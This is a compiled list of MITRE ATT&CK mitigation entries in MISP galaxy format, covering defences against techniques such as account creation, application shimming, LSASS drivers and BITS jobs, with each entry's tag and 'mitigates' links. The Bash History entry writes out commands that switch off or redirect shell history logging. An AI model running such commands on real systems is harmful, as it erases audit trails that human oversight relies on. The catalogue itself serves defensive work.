Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to create privileged accounts within an environment.

Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.

Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.

The tag is: `misp-galaxy:mitre-course-of-action="Create Account Mitigation - T1136"`

Create Account Mitigation - T1136 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Create Account - T1136"` with estimative-language:likelihood-probability="almost-certain"
Application Shimming Mitigation - T1138

There currently aren't a lot of ways to mitigate application shimming. Disabling the Shim Engine isn't recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.

Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.

The tag is: misp-galaxy:mitre-course-of-action="Application Shimming Mitigation - T1138"

Application Shimming Mitigation - T1138 has relationships with:


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Spearphishing Attachment Mitigation - T1193

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.

Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails. To prevent the attachments from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Attachment Mitigation - T1193"

Spearphishing Attachment Mitigation - T1193 has relationships with:

Bash History Mitigation - T1139

There are multiple methods of preventing a user’s command history from being flushed to their .bash_history file, including use of the following commands: `<code>set +o history</code>` and `<code>set -o history</code>` to start logging again; `<code>unset HISTFILE</code>` being added to a user’s .bash_rc file; and `<code>ln -s /dev/null ~/.bash_history</code>` to write commands to `<code>/dev/null</code>` instead.

The tag is: `misp-galaxy:mitre-course-of-action="Bash History Mitigation - T1139"`

Bash History Mitigation - T1139 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Bash History - T1552.003"` with estimative-language:likelihood-probability="almost-certain"

Gatekeeper Bypass Mitigation - T1144

Other tools should be used to supplement Gatekeeper’s functionality. Additionally, system settings can prevent applications from running that haven’t been downloaded through the Apple Store which can help mitigate some of these issues.

The tag is: `misp-galaxy:mitre-course-of-action="Gatekeeper Bypass Mitigation - T1144"`

Gatekeeper Bypass Mitigation - T1144 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144"` with estimative-language:likelihood-probability="almost-certain"

Private Keys Mitigation - T1145

Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are
properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: *misp-galaxy:mitre-course-of-action="Private Keys Mitigation - T1145"*

Private Keys Mitigation - T1145 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

**Hidden Users Mitigation - T1147**

If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the `<code>/Library/Preferences/com.apple.loginwindow</code> <code>Hide500Users</code> value will force all users to be visible.

The tag is: *misp-galaxy:mitre-course-of-action="Hidden Users Mitigation - T1147"*

Hidden Users Mitigation - T1147 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147" with estimative-language:likelihood-probability="almost-certain"

**SSH Hijacking Mitigation - T1184**

Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations where only the legitimate owner has access to with strong passwords and are rotated frequently. Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)

The tag is: *misp-galaxy:mitre-course-of-action="SSH Hijacking Mitigation - T1184"*
SSH Hijacking Mitigation - T1184 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"

Table 4082. Table References

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LC_MAIN Hijacking Mitigation - T1149

Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.

The tag is: misp-galaxy:mitre-course-of-action="LC_MAIN Hijacking Mitigation - T1149"

LC_MAIN Hijacking Mitigation - T1149 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149" with estimative-language:likelihood-probability="almost-certain"

Table 4083. Table References

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Startup Items Mitigation - T1165

Since StartupItems are deprecated, preventing all users from writing to the <code>/Library/StartupItems</code> directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can’t be leveraged for privilege escalation.

The tag is: misp-galaxy:mitre-course-of-action="Startup Items Mitigation - T1165"

Startup Items Mitigation - T1165 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"

Table 4084. Table References

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**Dylib Hijacking Mitigation - T1157**

Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can't write to these directories, then they can't intercept the search path.

The tag is: `misp-galaxy:mitre-course-of-action="Dylib Hijacking Mitigation - T1157"`

Dylib Hijacking Mitigation - T1157 has relationships with:

- `mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"`

**Launch Agent Mitigation - T1159**

Restrict user's abilities to create Launch Agents with group policy.

The tag is: `misp-galaxy:mitre-course-of-action="Launch Agent Mitigation - T1159"`

Launch Agent Mitigation - T1159 has relationships with:

- `mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159" with estimative-language:likelihood-probability="almost-certain"`

**Browser Extensions Mitigation - T1176**

Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.

Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)

Change settings to prevent the browser from installing extensions without sufficient permissions.

Close out all browser sessions when finished using them.

The tag is: `misp-galaxy:mitre-course-of-action="Browser Extensions Mitigation - T1176"`
Browser Extensions Mitigation - T1176 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

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Process Doppelgänging Mitigation - T1186

This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although Process Doppelgänging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Doppelgänging Mitigation - T1186"

Process Doppelgänging Mitigation - T1186 has relationships with:


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LSASS Driver Mitigation - T1177

On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code> to <code>dword:00000001</code>. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.

On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)

Ensure safe DLL search mode is enabled <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</code> to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)

The tag is: <code>misp-galaxy:mitre-course-of-action="LSASS Driver Mitigation - T1177"</code>

LSASS Driver Mitigation - T1177 has relationships with:

• mitigates: <code>misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177"</code> with estimative-language:likelihood-probability="almost-certain"

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Forced Authentication Mitigation - T1187

Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)

For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.
Forced Authentication Mitigation - T1187 has relationships with:


### BITS Jobs Mitigation - T1197

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, disabling all BITS functionality will likely have unintended side effects, such as preventing legitimate software patching and updating. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: Mondok Windows PiggyBack BITS May 2007)

Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.

Consider limiting access to the BITS interface to specific users or groups. (Citation: Symantec BITS May 2007)

Consider reducing the default BITS job lifetime in Group Policy or by editing the <code>JobInactivityTimeout</code> and <code>MaxDownloadTime</code> Registry values in <code>HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS</code>. (Citation: Microsoft BITS)

The tag is: misp-galaxy:mitre-course-of-action="BITS Jobs Mitigation - T1197"

BITS Jobs Mitigation - T1197 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/">https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/</a></td>
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</table>
Trusted Relationship Mitigation - T1199

Network segmentation can be used to isolate infrastructure components that do not require broad network access. Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. Vet the security policies and procedures of organizations that are contracted for work that require privileged access to network resources.

The tag is: misp-galaxy:mitre-course-of-action="Trusted Relationship Mitigation - T1199"

Trusted Relationship Mitigation - T1199 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

Table 4092. Table References

| Links | https://attack.mitre.org/mitigations/T1199 |

Firmware Corruption Mitigation - T1495

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.

The tag is: misp-galaxy:mitre-course-of-action="Firmware Corruption Mitigation - T1495"

Firmware Corruption Mitigation - T1495 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"

Table 4093. Table References

| Links | https://attack.mitre.org/mitigations/T1495 |

Resource Hijacking Mitigation - T1496

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Resource Hijacking Mitigation - T1496"
Resource Hijacking Mitigation - T1496 has relationships with:


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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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</table>

Data Destruction Mitigation - T1488

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

Identify potentially malicious software and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Destruction Mitigation - T1488"

Data Destruction Mitigation - T1488 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488" with estimative-language:likelihood-probability="almost-certain"


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<td><a href="https://www.ready.gov/business/implementation/IT">https://www.ready.gov/business/implementation/IT</a></td>
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Service Stop Mitigation - T1489

Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.

The tag is: `misp-galaxy:mitre-course-of-action="Service Stop Mitigation - T1489"`

Service Stop Mitigation - T1489 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with estimative-language:likelihood-probability="almost-certain"

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Multi-factor Authentication - M1032

Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.

The tag is: `misp-galaxy:mitre-course-of-action="Multi-factor Authentication - M1032"`

Multi-factor Authentication - M1032 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Create Account - T1136"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Email Collection - T1114"` with estimative-

• mitigates: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Add Office 365 Global Administrator Role - T1098.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-
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**Rc.common Mitigation - T1163**

Limit privileges of user accounts so only authorized users can edit the rc.common file.

The tag is: `misp-galaxy:mitre-course-of-action="Rc.common Mitigation - T1163"`

Rc.common Mitigation - T1163 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Rc.common - T1163"` with estimative-language:likelihood-probability="almost-certain"
SSL/TLS Inspection - M1020

Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.

The tag is: `misp-galaxy:mitre-course-of-action="SSL/TLS Inspection - M1020"`

SSL/TLS Inspection - M1020 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"` with estimative-language:likelihood-probability="almost-certain"

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Regsvcs/Regasm Mitigation - T1121

Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: `misp-galaxy:mitre-course-of-action="Regsvcs/Regasm Mitigation - T1121"`

Regsvcs/Regasm Mitigation - T1121 has relationships with:


Table 4100. Table References

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Security Updates - M1001

Install security updates in response to discovered vulnerabilities.

Purchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.

Decommission devices that will no longer receive security updates.

Limit or block access to enterprise resources from devices that have not installed recent security updates.

On Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.

The tag is: `misp-galaxy:mitre-course-of-action="Security Updates - M1001"`

Security Updates - M1001 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1408"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398"` with estimative-language:likelihood-probability="almost-certain"
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- mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"


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**Lock Bootloader - M1003**

On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.

The tag is: misp-galaxy:mitre-course-of-action="Lock Bootloader - M1003"

Lock Bootloader - M1003 has relationships with:


- mitigates: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"

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**Network Segmentation - M1030**

Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a
DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.

The tag is: `misp-galaxy:mitre-course-of-action="Network Segmentation - M1030"`

**Network Segmentation - M1030** has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Create Account - T1136"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay -
T1557.001" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"


Table 4103. Table References

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**Application Vetting - M1005**

Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.

Enterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.

Application Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.

The tag is: *misp-galaxy:mitre-course-of-action="Application Vetting - M1005"*

Application Vetting - M1005 has relationships with:


- mitigates: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1421" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="URL Scheme Hijacking - T1415" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Code Injection - T1540" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"
Exploit Protection - M1050

Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

The tag is: `misp-galaxy:mitre-course-of-action="Exploit Protection - M1050"`

Exploit Protection - M1050 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Rundll32 - T1085"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117"` with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

